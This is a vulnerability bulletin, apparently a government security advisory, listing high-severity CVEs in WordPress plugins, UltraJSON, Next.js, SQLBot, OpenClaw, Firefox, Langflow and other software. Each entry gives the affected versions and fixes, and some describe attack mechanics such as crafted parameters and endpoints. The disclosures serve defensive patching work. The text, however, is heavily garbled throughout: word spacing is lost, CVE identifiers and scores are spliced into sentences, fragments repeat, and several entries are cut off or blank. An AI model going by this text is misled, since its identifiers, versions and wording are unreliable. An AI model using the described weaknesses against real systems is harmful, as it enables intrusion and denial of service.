Details2468unauthenticatedattackerstoappendadditionalSQLqueriesintoalreadyexistingqueriesthatcanbeusedto extractsensitiveinformationfromthedatabase. 
Out-of-boundsreadinALPNparsingduetoincompletevalidation.wolfSSL5.8.4andearliercontainedanout-of- CVE-boundsreadinALPNhandlingwhenbuiltwithALPNenabled(HAVEALPN/--enable-alpn).AcraftedALPNprotocol More2026-listcouldtriggeranout-of-boundsread,leadingtoapotentialprocesscrash(denialofservice).NotethatALPNis 7.5 Details3547disabledbydefault,butisenabledforthese3rdpartycompatibilityfeatures:enable-apachehttpd,enable-bind, enable-curl,enable-haproxy,enable-hitch,enable-lighty,enable-jni,enable-nginx,enable-quic. OpenClawversionspriorto2026.3.2containadenialofservicevulnerabilityinwebhookhandlersforBlueBubblesCVE-andGoogleChatthatparserequestbodiesbeforeperformingauthenticationandsignaturevalidation. More 7.5 Unauthenticatedattackerscanexploitthisbysendingsloworoversizedrequestbodiestoexhaustparser Details32011 resourcesanddegradeserviceavailability. resourcesanddegradeserviceavailability. CVE-Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoIncorrectConversionbetweenNumericTypes Moreduetohandlingnegativeexponentsinext/jsbn2.js.Anattackercanforcethecomputationofincorrectmodular 7.5 DetailsinversesandbreaksignatureverificationbycallingmodPowwithanegativeexponent. CVE- More2026-Versionspriorto7.15.1and8.9.3containaServer-SideRequestForgery(SSRF)vulnerabilitycombinedwitha 7.5 Details29097DenialofService(DoS)conditionintheRSSFeedDashletcomponent.Versions7.15.1and8.9.3patchtheissue. Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoInfiniteloopviathebnModInversefunctioninCVE-ext/jsbn2.jswhentheBigInteger.modInverseimplementationreceiveszeroornegativeinputs,allowingan More2026- 7.5attackertohangtheprocesspermanentlybysupplyingsuchcraftedvalues(e.g.,modInverse(0,m)or Details4598modInverse(-1,m)). 
EasyChatServer3.1containsadenialofservicevulnerabilitythatallowsremoteattackerstocrashtheCVE-applicationbysendingoversizeddatainthemessageparameter.Attackerscanestablishasessionviathe More2019- 7.5chat.ghpendpointandthensendaPOSTrequesttobody2.ghpwithanexcessivelylargemessageparameter Details25613valuetocausetheservicetocrash. CVE-unauthenticatedattackercancausealegitimateDiscourseauthorizationpagetodisplayanattacker-controlled More2026- 7.5domain,facilitatingsocialengineeringattacksagainstusers.Versions2026.3.0-latest.1,2026.2.1,and2026.1.2 Details33427 Discourseisanopen-sourcediscussionplatform.Priortoversions2026.3.0-latest.1,2026.2.1,and2026.1.2,usersCVE-whodonotbelongtotheallowedpolicycreationgroupscancreatefunctionalpolicyacceptancewidgetsinposts More2026- 7.5undertherightconditions.Versions2026.3.0-latest.1,2026.2.1,and2026.1.2containapatch.Asaworkaround, Details29072disablethediscourse-policypluginbydisablingthepolicy_enabledsitesetting. 
UltraJSONisafastJSONencoderanddecoderwritteninpureCwithbindingsforPython3.7+.Versions5.10 through5.11.0arevulnerabletobufferoverfloworinfiniteloopthroughlargeindenthandling.ujson.dumps() crashesthePythoninterpreter(segmentationfault)whentheproductoftheindentparameterandthenested depthoftheinputexceedsINT32MAX.Itcanalsogetstuckinaninfiniteloopiftheindentisalargenegative CVE-number.Botharecausedbyanintegeroverflow/underflowwhilstcalculatinghowmuchmemorytoreservefor More2026-indentation.Andbothcanbeusedtoachievedenialofservice.Tobevulnerable,aservicemustcall 7.5 Details32875ujson.dump()/ujson.dumps()/ujson.encode()whilstgivinguntrusteduserscontrolovertheindentparameterand notrestrictthatindentationtoreasonablysmallnon-negativevalues.Aservicemayalsobevulnerabletothe infiniteloopifitusesafixednegativeindent.Anunderflowalwaysoccursforanynegativeindentwhentheinput dataisatleastonelevelnestedbut,forsmallnegativeindents,theunderflowisusuallyaccidentallyrectifiedby anotheroverflow.Thisissuehasbeenfixedinversion5.12.0. TheWPMaps–StoreLocator,GoogleMaps,OpenStreetMap,Mapbox,Listing,Directory&FilterspluginforWordPress CVE-isvulnerabletotime-basedSQLInjectionviathe‘orderby’parameterinallversionsupto,andincluding,4.9.1due More2026-toinsufficientescapingontheusersuppliedparameterandlackofsufficientpreparationontheexistingSQL 7.5 Details2580query.ThismakesitpossibleforunauthenticatedattackerstoappendadditionalSQLqueriesintoalreadyexisting queriesthatcanbeusedtoextractsensitiveinformationfromthedatabase. 
UltraJSONisafastJSONencoderanddecoderwritteninpureCwithbindingsforPython3.7+.Versions5.4.0 through5.11.0containanaccumulatingmemoryleakinJSONparsinglarge(outsideoftherange[-2^63,2^64- 1])integers.TheleakedmemoryisacopyofthestringformoftheintegerplusanadditionalNULLbyte.TheleakCVE-occursirrespectiveofwhethertheintegerparsessuccessfullyorisrejectedduetohavingmorethan More2026- 7.5sys.getintmaxstrdigits()digits,meaningthatanysizedleakpermaliciousJSONcanbeachievedprovidedthat Details32874thereisnolimitontheoverallsizeofthepayload.Anyservicethatcallsujson.load()/ujson.loads()/ujson.decode() onuntrustedinputsisaffectedandvulnerabletodenialofserviceattacks.Thisissuehasbeenfixedinversion 5.12.0. OpenClawversionspriorto2026.3.1failtoenforcesandboxinheritanceduringcross-agentsessionsspawnCVE-operations,allowingsandboxedsessionstocreatechildprocessesunderunsandboxedagents.Anattackerwitha More2026- 7.5sandboxedsessioncanexploitthistospawnchildruntimeswithsandbox.modesettooff,bypassingruntime Details32048confinementrestrictions. eweisaGleamwebserver.Versions0.8.0through3.0.4containabuginthehandletrailersfunctionwhere rejectedtrailerheaders(forbiddenorundeclared)causeaninfiniteloop.Whenhandletrailersencounterssucha trailer,threecodepaths(lines520,523,526)recursewiththeoriginalbuffer(rest)insteadofadvancingpastthe CVE-rejectedheader(Buffer(headerrest,0)),causingdecoder.decodepackettore-parsethesameheaderonevery More 2026- 7.5iteration.Theresultingloophasnotimeoutorescape—theBEAMprocesspermanentlywedgesat100%CPU. 
Details 32873Anyapplicationthatcallsewe.read_bodyonchunkedrequestsisaffected,andthisisexploitablebyany unauthenticatedremoteclientbeforecontrolreturnstoapplicationcode,makinganapplication-levelworkaround impossible.Thisissueisfixedinversion3.0.5.

SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,theWebSocketendpoint(/ws) allowsunauthenticatedconnectionswhenspecificURLparametersareprovided(? app=siyuan&id=auth&type=auth).Thisbypass,intendedfortheloginpagetokeepthekernelalive,allowsanyCVE- Moreexternalclient—includingmaliciouswebsitesviacross-originWebSocket—toconnectandreceiveallserver 7.5 Details externalclient—includingmaliciouswebsitesviacross-originWebSocket—toconnectandreceiveallserver 7.5 Detailspusheventsinreal-time.Theseeventsleaksensitivedocumentmetadataincludingdocumenttitles,notebook32815 names,filepaths,andallCRUDoperationsperformedbyauthenticatedusers.Combinedwiththeabsenceof Originheadervalidation,amaliciouswebsitecansilentlyconnecttoavictim'slocalSiYuaninstanceandmonitor theirnote-takingactivity.Thisissuehasbeenfixedinversion3.6.1. CVE-OpenClawversionspriorto2026.2.22failtoconsistentlyenforceconfiguredinboundmediabytelimitsbefore More2026-bufferingremotemediaacrossmultiplechannelingestionpaths.Remoteattackerscansendoversizedmedia 7.5 Details32049payloadstotriggerelevatedmemoryusageandpotentialprocessinstability. AutoMapperisaconvention-basedobject-objectmapperin.NET.Versionspriorto15.1.1and16.1.1are CVE-vulnerabletoaDenialofService(DoS)attack.Whenmappingdeeplynestedobjectgraphs,thelibraryuses More2026-recursivemethodcallswithoutenforcingadefaultmaximumdepthlimit.Thisallowsanattackertoprovidea 7.5 Details32933speciallycraftedobjectgraphthatexhauststhethread'sstackmemory,triggeringaStackOverflowException andcausingtheentireapplicationprocesstoterminate.Versions15.1.1and16.1.1fixtheissue. 
WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,theHLSstreamingendpoint (view/hls.php)isvulnerabletoapathtraversalattackthatallowsanunauthenticatedattackertostreamanyCVE-privateorpaidvideoontheplatform.ThevideoDirectoryGETparameterisusedintwodivergentcodepaths— More2026- 7.5oneforauthorization(whichtruncatesatthefirst/segment)andoneforfileaccess(whichpreserves.. Details33292traversalsequences)—creatingasplit-oracleconditionwhereauthorizationischeckedagainstonevideowhile contentisservedfromanother.Version26.0containsafixfortheissue. CVE-EquityPandit1.0containsaninsecureloggingvulnerabilitythatallowsattackerstocapturesensitiveuser More2019-credentialsbyaccessingdeveloperconsolelogsviaAndroidDebugBridge.Attackerscanuseadblogcattoextract 7.5 Details25605plaintextpasswordsloggedduringtheforgotpasswordfunction,exposinguseraccountcredentials. TheWPJobPortalpluginforWordPressisvulnerabletoSQLInjectionviathe'radius'parameterinallversionsupCVE-to,andincluding,2.4.8duetoinsufficientescapingontheusersuppliedparameterandlackofsufficient More2026- 7.5preparationontheexistingSQLquery.Thismakesitpossibleforunauthenticatedattackerstoappendadditional Details4306SQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitiveinformationfromthedatabase. 
ModgnutlsisaTLSmoduleforApacheHTTPDbasedonGnuTLS.Inversionspriorto0.12.3and0.13.0,codefor clientcertificateverificationimportedthecertificatechainsentbytheclientintoafixedsize`gnutlsx509crtt x509[]arraywithoutcheckingthenumberofcertificatesislessthanorequaltothearraysize.gnutlsx509crttisatypedefforapointertoanopaqueGnuTLSstructurecreatedusingwithgnutlsx509crtinit()beforeimportingcertificatedataintoit,sonoattacker-controlleddatawaswrittenintoCVE-thestackbuffer,butwritingapointerafterthelastarrayelementgenerallytriggeredasegfault,andcould More2026- 7.5theoreticallycausestackcorruptionotherwise(notobservedinpractice).Serverconfigurationsthatdonotuse Details33307clientcertificates(GnuTLSClientVerifyignore,thedefault)arenotaffected.Theproblemhasbeenfixedin version0.12.3bycheckingthelengthoftheprovidedcertificatechainandrejectingitifitexceedsthebuffer length,andinversion0.13.0byrewritingcertificateverificationtousegnutlscertificateverifypeers(), removingtheneedforthebufferentirely.Thereisnoworkaround.Version0.12.3providestheminimalfixfor usersof0.12.xwhodonotwishtoupgradeto0.13.0yet. CVE-MissingReleaseofMemoryafterEffectiveLifetimevulnerabilityinMolotovCherryAndroid-ImageMagick7.This More2026- 7.5issueaffectsAndroid-ImageMagick7:before7.1.2-11. Details33852 CVE-IncorrectboundaryconditionsintheLayout:TextandFontscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4699 CVE-IncorrectboundaryconditionsintheAudio/Video:WebCodecscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. 
Details4697 CVE-IncorrectboundaryconditionsintheAudio/Video:WebCodecscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4695 CVE-IncorrectboundaryconditionsintheAudio/Video:Playbackcomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4693 Glancesisanopen-sourcesystemcross-platformmonitoringtool.TheGHSA-gh4xfix(commit5d3de60) addressedunauthenticatedconfigurationsecretsexposureonthe/api/v4/configendpointsbyintroducingasdictsecure()redaction.However,the/api/v4/argsand/api/v4/args/{item}endpointswerenotaddressedCVE- Morebythisfix.Theseendpointsreturnthecompletecommand-lineargumentsnamespaceviavars(self.args)`,which2026- 7.5 Detailsincludesthepasswordhash(salt+pbkdf2hmac),SNMPcommunitystrings,SNMPauthenticationkeys,andthe32609 configurationfilepath.WhenGlancesrunswithout--password(thedefault),theseendpointsareaccessible withoutanyauthentication.Version4.5.2providesamorecompletefix. CVE- 7.5 More Details FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details CVE- More 7.5 Details Jenkins2.442through2.554(bothinclusive),LTS2.426.3throughLTS2.541.2(bothinclusive)performsoriginCVE-validationofrequestsmadethroughtheCLIWebSocketendpointbycomputingtheexpectedoriginfor More2026- 7.5comparisonusingtheHostorX-Forwarded-HostHTTPrequestheaders,makingitvulnerabletoDNSrebinding Details33002attacksthatallowbypassingoriginvalidation. CVE-Racecondition,use-after-freeintheGraphics:WebRendercomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4684 CVE-AzipslipvulnerabilityintheAdminimportfunctionalityofCTFdv3.8.1-18-gdb5a18c4allowsattackerstowrite More2026- 7.5arbitraryfilesoutsidetheintendeddirectoriesviasupplyingacraftedimport. 
Details30345 CVE-AnunauthenticatedremoteattackermaybeabletocontroltheformatstringofmessagesprocessedbytheAudit More2026- 7.5LogoftheCODESYSControlruntimesystem,potentiallyresultinginadenial‑of‑service(DoS)condition. Details3509 CVE-MissingReleaseofMemoryafterEffectiveLifetimevulnerabilityinMolotovCherryAndroid-ImageMagick7.This More2026- 7.5issueaffectsAndroid-ImageMagick7:before7.1.2-11. Details33856 CVE- More2026- 7.5 Details4706 nghttp2isanimplementationoftheHypertextTransferProtocolversion2inC.Priortoversion1.68.1,the nghttp2librarystopsreadingtheincomingdatawhenuserfacingpublicAPInghttp2_session_terminate_session CVE-ornghttp2_session_terminate_session2iscalledbytheapplication.Theymightbecalledinternallybythelibrary More2026-whenitdetectsthesituationthatissubjecttoconnectionerror.Duetothemissinginternalstatevalidation,the 7.5 Details27135librarykeepsreadingtherestofthedataafteroneofthoseAPIsiscalled.Thenreceivingamalformedframethat causesFRAMESIZEERRORcausesassertionfailure.nghttp2v1.68.1addsmissingstatevalidationtoavoid assertionfailure.Noknownworkaroundsareavailable. CVE-AnissueintheVirtualHostconfigurationhandling/parsercomponentofaaPanelv7.57.0allowsattackerstocause More2026- 7.5aRegularExpressionDenialofService(ReDoS)viaacraftedinput. Details29856 CVE-AlackofpathvalidationinaaPanelv7.57.0allowsattackerstoexecutealocalfileinclusion(LFI),leadingot More2026- 7.5sensitiveinformationexposure. 
Details29858 TheJetEnginepluginforWordPressisvulnerabletoSQLInjectionviathelisting_load_moreAJAXactioninall versionsupto,andincluding,3.8.6.1.Thisisduetothefiltered_queryparameterbeingexcludedfromtheHMAC CVE-signaturevalidation(allowingattacker-controlledinputtobypasssecuritychecks)combinedwiththe More2026-prepare_where_clause()methodintheSQLQueryBuildernotsanitizingthecompareoperatorbefore 7.5 Details4662concatenatingitintoSQLstatements.Thismakesitpossibleforunauthenticatedattackerstoappendadditional SQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitiveinformationfromthedatabase, providedthesitehasaJetEngineListingGridwithLoadMoreenabledthatusesaSQLQueryBuilderquery. CVE-VitalsESPdevelopedbyGalaxySoftwareServiceshasaMissingAuthenticationvulnerability,allowing More2026- 7.5unauthenticatedremoteattackerstoexecutecertainfunctionstoobtainsensitiveinformation. Details4640

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whilemostalignment recordsstoreDNAsequenceandqualityvalues,theformatalsoallowsthemtoomitthisdataincertaincasesto CVE-savespace.DuetosomequirksoftheCRAMformat,itisnecessarytohandletheserecordscarefullyastheywill More 2026-actuallystoredatathatneedstobeconsumedandthendiscarded.UnfortunatelytheCONST,XPACKand 7.5 Details 31964XRLEencodingsdidnotproperlyimplementtheinterfaceneededtodothis.Tryingtodecoderecordswith omittedsequenceorqualitydatausingtheseencodingswouldresultinanattempttowritetoaNULLpointer. ExploitingthisbugcausesaNULLpointerdereference.Typicallythiswillcausetheprogramtocrash.Versions 1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. SAMtoolsisaprogramforreading,manipulatingandwritingbioinformaticsfileformats.Startinginversion1.17,in CVE-thecram-sizecommand,usedtowriteinformationabouthowwellCRAMfilesarecompressed,achecktoseeif Morethecram_decode_compression_header()wasmissing.Ifthefunctionreturnedanerror,thiscouldleadtoaNULL 7.5 Details31973pointerdereference.ExploitingthisbugcausesaNULLpointerdereference.Typicallythiswillcausetheprogram tocrash.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue.

PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelowhavea CVE-cascadingout-of-boundsheapreadinpjsipmultipartparse().Afterboundarystringmatching,curptrisadvanced Morepastthedelimiterwithoutverifyingithasnotreachedthebufferend.Thisallows1-2bytesofadjacentheap 7.5 Details33069memorytoberead.AllapplicationsthatprocessincomingSIPmessageswithmultipartbodiesorSDPcontentare potentiallyaffected.Thisissueisresolvedinversion2.17. Qwikisaperformance-focusedJavaScriptframework.Versionspriorto1.19.2improperlyinferredarraysfrom dottedformfieldnamesduringFormDataparsing.Bysubmittingmixedarray-indexandobject-propertykeysfor thesamepath,anattackercouldcauseuser-controlledpropertiestobewrittenontovaluesthatapplicationcode CVE-expectedtobearrays.Whenprocessingapplication/x-www-form-urlencodedormultipart/form-datarequests, More2026-QwikCityconverteddottedfieldnames(e.g.,items.0,items.1)intonestedstructures.Ifapathwasinterpretedas 7.5 Details32701anarray,additionalattacker-suppliedkeysonthatpath—suchasitems.toString,items.push,items.valueOf,or items.length—couldaltertheresultingserver-sidevalueinunexpectedways,potentiallyleadingtorequest handlingfailures,denialofservicethroughmalformedarraystateoroversizedlengths,andtypeconfusionin downstreamcode.Thisissuewasfixedinversion1.19.2. 
OneUptimeisasolutionformonitoringandmanagingonlineservices.Priortoversion10.0.34,theWhatsApp POSTwebhookhandler(/notification/whatsapp/webhook)processesincomingstatusupdateeventswithoutCVE-verifyingtheMeta/WhatsAppX-Hub-Signature-256HMACsignature,allowinganyunauthenticatedattackerto More2026- 7.5sendforgedwebhookpayloadsthatmanipulatenotificationdeliverystatusrecords,suppressalerts,andcorrupt Details33143audittrails.ThecodebasealreadyimplementspropersignatureverificationforSlackwebhooks.Thisissuehas beenpatchedinversion10.0.34. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versionspriorto1.7.0 containaServer-SideRequestForgery(SSRF)vulnerabilitythatallowsanattackertoretrievearbitrarysystemand applicationfilesfromtheserver.Anattackercanexploitthe/api/v1/datasource/checkendpointbyconfiguringaCVE-forgedMySQLdatasourcewithamaliciousparameterextraJdbc="local_infile=1".WhentheSQLBotbackend More2026- 7.5attemptstoverifytheconnectivityofthisdatasource,anattacker-controlledRogueMySQLserverissuesa Details32949maliciousLOADDATALOCALINFILEcommandduringtheMySQLhandshake.Thisforcesthetargetservertoread arbitraryfilesfromitslocalfilesystem(suchas/etc/passwdorconfigurationfiles)andtransmitthecontentsback totheattacker.Thisissuewasfixedinversion1.7.0. CVE-Denial-of-serviceintheWebRTC:Signalingcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< More2026- 7.5 Details4704 CVE- More2026- 7.5 Details4707

9.6.0-alpha.24and8.6.47,remoteclientscancrashtheParseServerprocessbycallingacloudfunctionendpointCVE-withacraftedfunctionnamethattraversestheJavaScriptprototypechainofaregisteredcloudfunctionhandler, More2026- 7.5causingastackoverflow.Thefixinversions9.6.0-alpha.24and8.6.47restrictspropertylookupsduringcloud Details32886functionnameresolutiontoownpropertiesonly,preventingprototypechaintraversalfromstoredfunction handlers.Thereisnoknownworkaround. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priorto4.5.2,GlanceswebserverrunswithoutCVE-authenticationbydefaultwhenstartedwithglances-w,exposingRESTAPIwithsensitivesysteminformation More2026- 7.5includingprocesscommand-linescontainingcredentials(passwords,APIkeys,tokens)toanynetworkclient. Details32596 CVE-NVIDIATritonInferenceServercontainsavulnerabilityintheHTTPendpointwhereanattackermaycauseadenial More2026-ofservicebyprovidingalargecompressedpayload.Asuccessfulexploitofthisvulnerabilitymayleadtodenialof 7.5 Details24158service.

16.1.7,arequestcontainingthenext-resume:1header(correspondingwithaPPRresumerequest)wouldbuffer requestbodieswithoutconsistentlyenforcingmaxPostponedStateSizeincertainsetups.Thepreviousmitigation protectedminimal-modedeployments,butequivalentnon-minimaldeploymentsremainedvulnerabletothesame unboundedpostponedresume-bodybufferingbehavior.InapplicationsusingtheAppRouterwithPartialCVE- MorePrerenderingcapabilityenabled(viaexperimental.pprorcacheComponents),anattackercouldsendoversized2026- 7.5 Detailsnext-resumePOSTpayloadsthatwerebufferedwithoutconsistentsizeenforcementinnon-minimal27979 deployments,causingexcessivememoryusageandpotentialdenialofservice.Thisisfixedinversion16.1.7by enforcingsizelimitsacrossallpostponed-bodybufferingpathsanderroringwhenlimitsareexceeded.If upgradingisnotimmediatelypossible,blockrequestscontainingthenext-resumeheader,asthisisnevervalid tobesentfromanuntrustedclient. Next.jsisaReactframeworkforbuildingfull-stackwebapplications.Startinginversion10.0.0andpriortoversion 16.1.7,thedefaultNext.jsimageoptimizationdiskcache(/_next/image)didnothaveaconfigurableupper bound,allowingunboundedcachegrowth.Anattackercouldgeneratemanyuniqueimage-optimizationvariantsCVE-andexhaustdiskspace,causingdenialofservice.Thisisfixedinversion16.1.7byaddinganLRU-backeddisk More cachewithimages.maximumDiskCacheSize,includingevictionofleast-recently-usedentrieswhenthelimitis Details 7.5 exceeded.SettingmaximumDiskCacheSize:0disablesdiskcaching.Ifupgradingisnotimmediatelypossible,27980 exceeded.SettingmaximumDiskCacheSize:0disablesdiskcaching.Ifupgradingisnotimmediatelypossible,27980 periodicallyclean.next/cache/imagesand/orreducevariantcardinality(e.g.,tightenvaluesfor images.localPatterns,images.remotePatterns,andimages.qualities). 
CVE-NVIDIATritonInferenceServercontainsavulnerabilitywhereanattackermaycauseinternalstatecorruption.A More 7.5successfulexploitofthisvulnerabilitymayleadtoadenialofservice. Details33254 CVE-NVIDIATritonInferenceServerSagemakerHTTPservercontainsavulnerabilitywhereanattackermaycausean More2025- 7.5exception.Asuccessfulexploitofthisvulnerabilitymayleadtodenialofservice. Details33238 pyLoadisafreeandopen-sourcedownloadmanagerwritteninPython.Fromversion0.4.0tobeforeversion 0.5.0b3.dev97,thesetconfigvalue()APIendpointallowsuserswiththenon-adminSETTINGSpermissionto CVE-modifyanyconfigurationoptionwithoutrestriction.Thereconnect.scriptconfigoptioncontrolsafilepaththatis More2026-passeddirectlytosubprocess.run()inthethreadmanager'sreconnectlogic.ASETTINGSusercansetthistoany 7.5 Details33509executablefileonthesystem,achievingRemoteCodeExecution.Theonlyvalidationinsetconfigvalue()isa hardcodedcheckforgeneral.storagefolder—allothersecurity-criticalsettingsincludingreconnect.scriptare writablewithoutanyallowlistorpathrestriction.Thisissuehasbeenpatchedinversion0.5.0b3.dev97. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.2,the LinkSharing.ReadAll()methodallowslinkshareauthenticateduserstolistalllinksharesforaproject,includingCVE-theirsecrethashes.WhileLinkSharing.CanRead()correctlyblockslinkshareusersfromreadingindividual More2026- 7.5sharesviaReadOne,theReadAllWebhandlerbypassesthischeckbynevercallingCanRead().Anattacker Details33680witharead-onlylinksharecanretrievehashesforwriteoradminlinksharesonthesameprojectand authenticatewiththem,escalatingtofulladminaccess.Version2.2.2patchestheissue. 
DiceBearisanavatarlibraryfordesignersanddevelopers.Priortoversion9.4.0,theensureSize()functionin @dicebear/converterreadthewidthandheightattributesfromtheinputSVGtodeterminetheoutput canvassizeforrasterization(PNG,JPEG,WebP,AVIF).AnattackerwhocansupplyacraftedSVGwithextremely largedimensions(e.g.width="999999999")couldforcetheservertoallocateexcessivememory,leadingto CVE-denialofservice.Thisprimarilyaffectsserver-sideapplicationsthatpassuntrustedoruser-suppliedSVGstothe More2026-converter'stoPng(),toJpeg(),toWebp(),ortoAvif()functions.Applicationsthatonlyconvertself-generated 7.5 Details29112DiceBearavatarsarenotpracticallyexploitable,butarestillrecommendedtoupgrade.Thisisfixedinversion 9.4.0.TheensureSize()functionnolongerreadsSVGattributestodetermineoutputsize.Instead,anewsize option(default:512,max:2048)controlstheoutputdimensions.Invalidvalues(NaN,negative,zero,Infinity)fall backtothedefault.Ifupgradingisnotimmediatelypossible,validateandsanitizethewidthandheight attributesofanyuntrustedSVGinputbeforepassingittotheconverter. pyasn1isagenericASN.1libraryforPython.Priorto0.6.3,thepyasn1libraryisvulnerabletoaDenialof Service(DoS)attackcausedbyuncontrolledrecursionwhendecodingASN.1datawithdeeplynestedstructures. 
AnattackercansupplyacraftedpayloadcontainingthousandsofnestedSEQUENCE(0x30)orSET(0x31)CVE-tagswith"IndefiniteLength"(0x80)markers.ThisforcesthedecodertorecursivelycallitselfuntilthePython More2026- 7.5interpretercrasheswithaRecursionErrororconsumesallavailablememory(OOM),crashingthehost Details30922application.ThisisadistinctvulnerabilityfromCVE-2026-23490(whichaddressedintegeroverflowsinOID decoding).ThefixforCVE-2026-23490(`MAXOIDARCCONTINUATIONOCTETS)doesnotmitigatethisrecursion issue.Version0.6.3fixesthisspecificissue. CVE-music-metadataisametadataparserforaudioandvideomediafiles.Priortoversion11.12.3,music-metadata's More2026-ASFparser(parseExtensionObject()inlib/asf/AsfParser.ts:112-158)entersaninfiniteloopwhenasub-object 7.5 Details32256insidetheASFHeaderExtensionObjecthasobjectSize=0`.Version11.12.3fixestheissue. ipmi-oeminFreeIPMIbefore1.16.17hasexploitablebufferoverflowsonresponsemessages.TheIntelligent PlatformManagementInterface(IPMI)specificationdefinesasetofinterfacesforplatformmanagement.Itis implementedbyalargenumberofhardwaremanufacturerstosupportsystemmanagement.Itismostcommonly usedforsensorreading(e.g.,CPUtemperaturesthroughtheipmi-sensorscommandwithinFreeIPMI)andremote CVE-powercontrol(theipmipowercommand).Theipmi-oemclientcommandimplementsasetofaIPMIOEM More2026-commandsforspecifichardwarevendors.Ifauserhassupportedhardware,theymaywishtousetheipmi-oem 7.5 Details33554commandtosendarequesttoaservertoretrievespecificinformation.Threesubcommandswerefoundtohave exploitablebufferoverflowsonresponsemessages.Theyare:"ipmi-oemdellget-last-post-code-getthelast POSTcodeandstringdescribingtheerroronsomeDellservers,""ipmi-oemsupermicroextra-firmware-info-get 
extrafirmwareinfoonSupermicroservers,"and"ipmi-oemwistronread-proprietary-string-readaproprietary stringonWistronservers." H3isaminimalH(TTP)framework.Inversionspriorto1.15.6andbetween2.0.0through2.0.1-rc.14, createEventStreamisvulnerabletoServer-SentEvents(SSE)injectionduetomissingnewlinesanitizationinCVE- MoreformatEventStreamMessage()andformatEventStreamComment().AnattackerwhocontrolsanypartofanSSE2026- 7.5 Detailsmessagefield(id,event,data,orcomment)caninjectarbitrarySSEeventstoconnectedclients.Thisissueis33128 fixedinversions1.15.6and2.0.1-rc.15. CVE-IncorrectboundaryconditionsintheGraphicscomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< More 7.5 Details CVE-AnissueinFree5GCv.4.2.0andbeforeallowsaremoteattackertocauseadenialofserviceviathefunction More 7.5 AnissueinFree5GCv.4.2.0andbeforeallowsaremoteattackertocauseadenialofserviceviathefunction More 7.5HandleAuthenticationFailureofthecomponentAMF Details30653 WhenthengxmailauthhttpmodulemoduleisenabledonNGINXPlusorNGINXOpenSource,undisclosedCVE-requestscancauseworkerprocessestoterminate.Thisissuemayoccurwhen(1)CRAM-MD5orAPOP More 7.5authenticationisenabled,and(2)theauthenticationserverpermitsretrybyreturningtheAuth-Waitresponse Details27651header.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)arenotevaluated. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Priortoversion1.7.1,intheCVE-downloadprofilepicturefunctionofthe/profilepictures/{foldername}/(unknown)endpoint,thefoldername More2026- 7.5andfilenameparametersarenotstrictlyfiltered,whichallowsthesecretkeytobereadacrossdirectories. Details33497Version1.7.1containsapatch. 
LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversions1.0.0through1.8.1, the`/api/v1/files/images/{flowid}/(unknown)`endpointservesimagefileswithoutanyauthenticationorCVE-ownershipcheck.AnyunauthenticatedrequestwithaknownflowidandfilenamereturnstheimagewithHTTP More2026- 7.5200.Inamulti-tenantdeployment,anyattackerwhocandiscoverorguessa`flowid(UUIDscanbeleaked Details33484throughotherAPIresponses)candownloadanyuser'suploadedimageswithoutcredentials.Version1.9.0 containsapatch. DiceBearisanavatarlibraryfordesignersanddevelopers.Priortoversion9.4.2,theensureSize()functionin@dicebear/converterusedaregex-basedapproachtorewriteSVGwidth/heightattributes,cappingthemat 2048pxtopreventdenialofservice.ThissizecappingcouldbebypassedbycraftingSVGinputthatcausesthe CVE-regextomatchanon-functionaloccurrenceof

Named provisions

CRITICAL VULNERABILITIES

Source

Analysis generated by AI. Source diff and links are from the original.

Classification

Agency
CSA
Published
March 25th, 2026
Instrument
Notice
Legal weight
Non-binding
Stage
Final
Change scope
Substantive
Document ID
Security Bulletin 25 March 2026

Who this affects

Applies to
Technology companies Manufacturers
Industry sector
5112 Software & Technology 3345 Medical Device Manufacturing
Activity scope
Vulnerability Management System Patching
Geographic scope
Singapore SG

Taxonomy

Primary area
Cybersecurity
Operational domain
IT Security
Compliance frameworks
NIST CSF
Topics
Vulnerability Management Software Security
